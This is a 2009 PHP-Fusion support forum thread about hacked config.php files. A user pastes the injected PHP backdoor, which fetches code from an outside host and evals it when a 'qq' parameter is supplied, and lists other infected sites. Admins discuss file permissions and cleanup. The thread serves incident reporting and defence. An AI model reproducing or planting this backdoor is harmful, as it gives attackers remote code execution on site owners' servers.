|
config.php phpfusion6 hacked
|
| Lory |
Posted on 04-01-2009 20:28
|
Junior Member
Posts: 36
Joined: 12.03.07
|
the config.php file was hacked
I had this in my config.php file before the database setting
 Code<?php
if(isset($_GET['qq'])) {
$sock = @fsockopen('km20725.keymachine.de', 80);
if($sock){
fwrite ($sock, 'GET http://km20725.keymachine.de/prv/index.php?host='.$_SERVER['SERVER_NAME'].'&qq='.$_GET['qq'].' HTTP/1.0'."rn");
fwrite ($sock, 'Host: km20725.keymachine.de'."rnrn");
while($content[] = fgets ($sock));
$content = implode('', $content);
@eval(trim(substr($content, strpos($content, "rnrn"))));
fclose ($sock);}
}
on the domain www.ka-design.info
Edited by Lory on 05-01-2009 11:35
www.slobodnovrije... |
| |
|
|
| Lory |
Posted on 04-01-2009 20:37
|
Junior Member
Posts: 36
Joined: 12.03.07
|
look, same thing happens here..
http://www.christianiateater.no/news.php
http://www.christianiateater.no/?qq=41870 - hacked part
found on google
and these are just the last referers (last few minutes)
They do the same with wordpress
http://www.vitalheute.com/
http://www.vitalheute.com/?qq=231700
Edited by Lory on 04-01-2009 21:11
www.slobodnovrije... |
| |
|
|
| Lory |
Posted on 05-01-2009 11:06
|
Junior Member
Posts: 36
Joined: 12.03.07
|
hm  very interesting, lot's of phpfusion sites hakced the same way nobody says nothing, just editing the first post so now it looks nice 
www.slobodnovrije... |
| |
|
|
| muscapaul |
Posted on 05-01-2009 11:57
|
Super Admin
Posts: 1370
Joined: 10.05.04
|
Looking on google along those lines it appears they are all v6 sites. Possibly they were attacked earlier when the were vulnerable and some of them even may still be vulnerable. Some sites appear to suffer either injected iframes or inserted weblink panels. These sites need to be cleaned with a full scan of the database and files on the server.
Paul
Time flies like an arrow, fruit flies like banana (Groucho Marx)
Sites: Diptera.info (site owner); Dutch language support site (superadministrator); muscapaul.com (site owner) |
| |
|
|
| kneekoo |
Posted on 05-01-2009 12:44
|
Super Admin
Posts: 346
Joined: 20.01.06
|
The question is... Did you CHMOD 644 your config.php after you finished the install? I only wish I could get that answer from the rest of the "hacked" people as well.
Yes, accidents can happen that a hack gets in between updates, but generally this kind of hacks reside in improper setups, which is basically the administrator's responsibility and recommended by the readme file. However, to avoid such situations we will add an extra check inside the core, just so we make sure config.php has the proper CHMOD.
Come visit PHP-Fusion Romania |
| |
|
|
| AusiMods |
Posted on 05-01-2009 13:47
|
Junior Member
Posts: 48
Joined: 27.11.04
|
its a fairly common hack and not only fusion being attacked by it also other cms and blog systems.
As kneekoo says check your file permissions etc as with correct permissions writing to the file is not so easy.
http://ausimods.com |
| |
|
|
| Lory |
Posted on 05-01-2009 14:02
|
Junior Member
Posts: 36
Joined: 12.03.07
|
my config.php is chmoded 644 all the time (after finished installation)
www.slobodnovrije... |
| |
|
|
| muscapaul |
Posted on 05-01-2009 15:01
|
Super Admin
Posts: 1370
Joined: 10.05.04
|
If they manage to get access to custom pages on a v6 site it is academic: they can use the custom pages to CHMOD any file and write to it, if they want. In v7 that will require the admin password of the administrator, so it will be more diffcult to do that.
Contact me if you want me to have a look at your site's files and database to see if anything is wrong. Preferably use IM.
Edited by muscapaul on 05-01-2009 15:03
Paul
Time flies like an arrow, fruit flies like banana (Groucho Marx)
Sites: Diptera.info (site owner); Dutch language support site (superadministrator); muscapaul.com (site owner) |
| |
|
